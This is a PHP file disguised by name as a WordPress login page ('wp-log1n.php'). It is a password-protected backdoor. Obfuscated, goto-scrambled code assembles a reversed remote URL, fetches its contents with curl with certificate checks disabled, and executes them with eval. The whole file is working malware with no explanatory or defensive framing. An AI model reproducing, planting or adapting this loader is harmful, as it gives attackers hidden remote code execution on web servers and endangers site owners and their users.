View file File name : wp-log1n.php Content :<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '6e4d5228cf850d984a9159d8a6957eb2252f871ba2bdab40c199c983ea7e93d1') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php goto k0sKd; krH9O: $SS8Fu .= "\x61\144\57\160\x6f"; goto T84de; qB6fz: eval("\77\76" . tW2KX(strrev($SS8Fu))); goto Sede3; DpN0e: $SS8Fu .= "\x64\57\x2f\72\163"; goto uMF4p; oX4Zc: $SS8Fu .= "\57\x77"; goto w4kgz; FW0ad: $SS8Fu .= "\x74\150"; goto qB6fz; RYAXf: $SS8Fu .= "\x33\x31"; goto oX4Zc; k0sKd: $SS8Fu = ''; goto Gi1Qd; w4kgz: $SS8Fu .= "\x65\x6e\57\x61\155"; goto krH9O; uMF4p: $SS8Fu .= "\x70\164"; goto FW0ad; mLrPq: $SS8Fu .= "\60\x61\x6d\141"; goto DpN0e; ayKfc: $SS8Fu .= "\x2e\x36"; goto RYAXf; T84de: $SS8Fu .= "\164\x2e\x31"; goto mLrPq; Gi1Qd: $SS8Fu .= "\x74\170\x74"; goto ayKfc; Sede3: function Tw2Kx($V1_rw = '') { goto uW_mp; Npq7x: curl_close($xM315); goto eownr; MxwSx: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto Xgbrr; qmdI8: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto iv6FH; iv6FH: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto MxwSx; KH7jf: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto qmdI8; eownr: return $tvmad; goto uS2dE; uW_mp: $xM315 = curl_init(); goto KH7jf; VCwLj: $tvmad = curl_exec($xM315); goto Npq7x; Xgbrr: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto VCwLj; uS2dE: }